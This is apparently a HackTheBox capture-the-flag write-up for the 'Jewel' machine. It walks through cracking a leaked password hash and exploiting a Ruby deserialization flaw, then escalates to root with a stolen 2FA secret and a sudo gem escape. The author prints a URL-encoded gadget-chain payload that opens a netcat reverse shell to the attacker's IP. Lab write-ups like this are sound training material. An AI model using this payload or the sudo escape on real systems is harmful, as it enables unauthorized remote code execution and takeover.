Scanning
We found port 22 (SSH) and ports 8000 and 8080 (HTTP), where port 8000
Let's add jewel.htb to our hosts file.
Enumeration
Port 8000
port 8080
Let's enumerate the BLOG!
We found 2 users, Bill and Jennifer.
Let's enumerate the REPO.
After some enumeration I found an SQL file, "bd.sql", and got some hashes.
I cracked Bill's hash, "spongebob", but couldn't log in; let's continue enumerating.
User flag
It's using Ruby 2.5.5; let's search for an exploit.
After searching I found a CVE.
I tested all the fields and found that the vulnerable input is in updating the user fields.
Payload
%04%08o%3A%40ActiveSupport%3A%3ADeprecation%3A%3ADeprecatedInstanceVariableProxy%09%3A%0E%40instanceo%3A%08ERB%08%3A%09%40srcI%22U%60rm+%2Ftmp%2Ff%3Bmkfifo%20%2ftmp%2ff%3bcat%20%2ftmp%2ff%7c%2fbin%2fsh+-i+2%3e%261%7cnc+10.10.XX.XX+9001+%3e%2Ftmp%2ff%60%06%3A%06ET%3A%0E%40filenameI%22%061%06%3B%09T%3A%0C%40linenoi%06%3A%0C%40method%3A%0Bresult%3A%09%40varI%22%0C%40result%06%3B%09T%3A%10%40deprecatorIu%3A%1FActiveSupport%3A%3ADeprecation%00%06%3B%09T
Change the IP address to your own.
$ su bill
Password:
bill@jewel:~$ whoami
bill
The password is "spongebob", which we cracked earlier.
Let's upgrade our shell.
Root flag
I listed the directory as the first step of enumeration and found Google Authenticator; it looks like the admin uses 2FA.
Let's get the secret key and use Google Authenticator.
Let's generate the OTP.
Let's use the OTP.
Looks like something is wrong.
This step blew my mind; I searched a lot and asked for a nudge on the HTB Discord server.
Someone told me it's about syncing with the victim box; let's see.
The timezone is different; let's set our machine to the victim's timezone.
Let's try to escalate privileges again.
Bam! It's working.
sudo gem open -e "/bin/sh -c /bin/sh" rdoc
Thanks for reading, I hope you enjoyed it.